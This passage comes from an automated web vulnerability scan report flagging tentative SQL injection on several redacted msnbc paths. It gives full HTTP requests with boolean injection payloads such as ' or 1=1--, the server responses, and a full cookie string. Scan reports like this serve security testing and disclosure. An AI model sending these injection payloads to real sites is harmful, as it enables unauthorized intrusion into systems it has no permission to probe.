HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:29:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
GET /_news/201113719482'%20or%201%3d2--%20/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:29:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39901
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19701695'%20or%201%3d1--%20 and 19701695'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 01:24:48 GMT Connection: close Vary: Accept-Encoding Content-Length: 40121
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 01:24:49 GMT Connection: close Vary: Accept-Encoding Content-Length: 40109
1.86. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://technolog.msnbc.redacted
Path:
/blackberry
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10556100%20or%201%3d1--%20 and 10556100%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /blackberry?110556100%20or%201%3d1--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:58:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 120979
GET /blackberry?110556100%20or%201%3d2--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:58:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 120989
1.87. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://technolog.msnbc.redacted
Path:
/facebook
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /facebook?1%20and%201%3d1--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:39:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127223
GET /facebook?1%20and%201%3d2--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:39:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127213
1.88. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://technolog.msnbc.redacted
Path:
/featured
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14912380'%20or%201%3d1--%20 and 14912380'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /featured?114912380'%20or%201%3d1--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 02:39:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 139058
GET /featured?114912380'%20or%201%3d2--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:39:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 139048
1.89. http://technolog.msnbc.redacted/justin-bieber [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://technolog.msnbc.redacted
Path:
/justin-bieber
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 68290612%20or%201%3d1--%20 and 68290612%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /justin-bieber?168290612%20or%201%3d1--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:04:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 135277
GET /justin-bieber?168290612%20or%201%3d2--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:04:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 135287
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 48291817'%20or%201%3d1--%20 and 48291817'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mark-zuckerberg48291817'%20or%201%3d1--%20 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:03:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40348
GET /mark-zuckerberg48291817'%20or%201%3d2--%20 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:03:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40332
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /xbox'%20and%201%3d1--%20 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:05:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40300
GET /xbox'%20and%201%3d2--%20 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:05:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40312
1.92. http://technolog.msnbc.redacted/xbox [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://technolog.msnbc.redacted
Path:
/xbox
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /xbox?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:04:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 149332
GET /xbox?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:04:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 149342
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41319614'%20and%201%3d1--%20/ns/today-entertainment/ HTTP/1.1 Host: today.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Cache-Control: private, max-age=163 Date: Sun, 30 Jan 2011 03:01:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 133103
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... e.","dateline":"LOS ANGELES","components":{"survey":null,"slices":[{"videos":[{"launch":41325432,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0},{"launch":41318699,"plt":1,"plc":0,"settings":34245299,"settingsOverride":25067201,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0},{"launch":41312381,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0},{"launch":41311278,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847500","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847500","ItemIndex":0},{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847500","ItemIndex":0},{"interactives":[{"headline":"Charlie Sheen\u0027s ups and downs","caption":"","credits":"TODAYshow.com","label":"Timeline","content":{"flashvars":{"omnitureInstanceName":"SheenTime","dataId":"CharlieSheen_timeline","_w":"1000","_h":"640"},"embedParams":{"width":"1000","height":"640","play":"true","loop":"true","menu":"false","quality":"Best","scale":"showall","salign":"tl","wmode":"opaque","bgcolor":"#FFFFFF","allowfullscreen":"true","allowscriptaccess":"always","allownetworking":"all"},"uri":"http://msnbcmedia.redacted/i/MSNBC/Components/Interactives/_templates/Timeline/timeline_template.swf","width":1000,"height":640,"typeName":"FlashInteractive","RenderAuthority":"-1075847500","ItemIndex":0},"archiveUri":"http://today.msnbc.redacted/id/41320098/ns/today-entertainment/","workbenchId":41320787,"typeName":"Interactive","RenderAuthority":"-1075847500","ItemIndex":0}],"typeName":"InteractiveSlice","RenderAuthority":"-1075847500","ItemIndex":0},{"bridge":[{"workbenchId":35313411,"headline":"Talent and troubles follow Charlie Sheen","totalSlides":32,"firstSlide":{"headline":"WOLVERINES!","caption":"Charlie Sheen, born Carlos Estevez, got his movie start in 1984\u0027s \"Red Dawn.\" His fellow young stars included Patrick Swayze, C. Thomas Howell, Lea Thompson and Jennifer Grey. (MGM)","src":"http://msnbcmedia4.msn.com/j/MSNBC/Components/Slideshows/_production/ss-10020 ...[SNIP]...
Request 2
GET /id/41319614'%20and%201%3d2--%20/ns/today-entertainment/ HTTP/1.1 Host: today.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Cache-Control: private, max-age=180 Date: Sun, 30 Jan 2011 03:01:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 133140
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... e.","dateline":"LOS ANGELES","components":{"survey":null,"slices":[{"videos":[{"launch":41325432,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41318699,"plt":1,"plc":0,"settings":34245299,"settingsOverride":25067201,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41312381,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41311278,"plt":1,"plc":0,"settings":34245299,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"interactives":[{"headline":"Charlie Sheen\u0027s ups and downs","caption":"","credits":"TODAYshow.com","label":"Timeline","content":{"flashvars":{"omnitureInstanceName":"SheenTime","dataId":"CharlieSheen_timeline","_w":"1000","_h":"640"},"embedParams":{"width":"1000","height":"640","play":"true","loop":"true","menu":"false","quality":"Best","scale":"showall","salign":"tl","wmode":"opaque","bgcolor":"#FFFFFF","allowfullscreen":"true","allowscriptaccess":"always","allownetworking":"all"},"uri":"http://msnbcmedia.redacted/i/MSNBC/Components/Interactives/_templates/Timeline/timeline_template.swf","width":1000,"height":640,"typeName":"FlashInteractive","RenderAuthority":"-1075847510","ItemIndex":0},"archiveUri":"http://today.msnbc.redacted/id/41320098/ns/today-entertainment/","workbenchId":41320787,"typeName":"Interactive","RenderAuthority":"-1075847510","ItemIndex":0}],"typeName":"InteractiveSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"bridge":[{"workbenchId":35313411,"headline":"Talent and troubles follow Charlie Sheen","totalSlides":32,"firstSlide":{"headline":"WOLVERINES!","caption":"Charlie Sheen, born Carlos Estevez, got his movie start in 1984\u0027s \"Red Dawn.\" His fellow young stars included Patrick Swayze, C. Thomas Howell, Lea Thompson and Jennifer Grey. (MGM)","src":"http://msnbcmedia4.msn.com/j/MSNBC/Components/Slideshows/_production/ss-10020 ...[SNIP]...
1.94. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://redcated
Path:
/APM/iview/139941180/direct
Issue detail
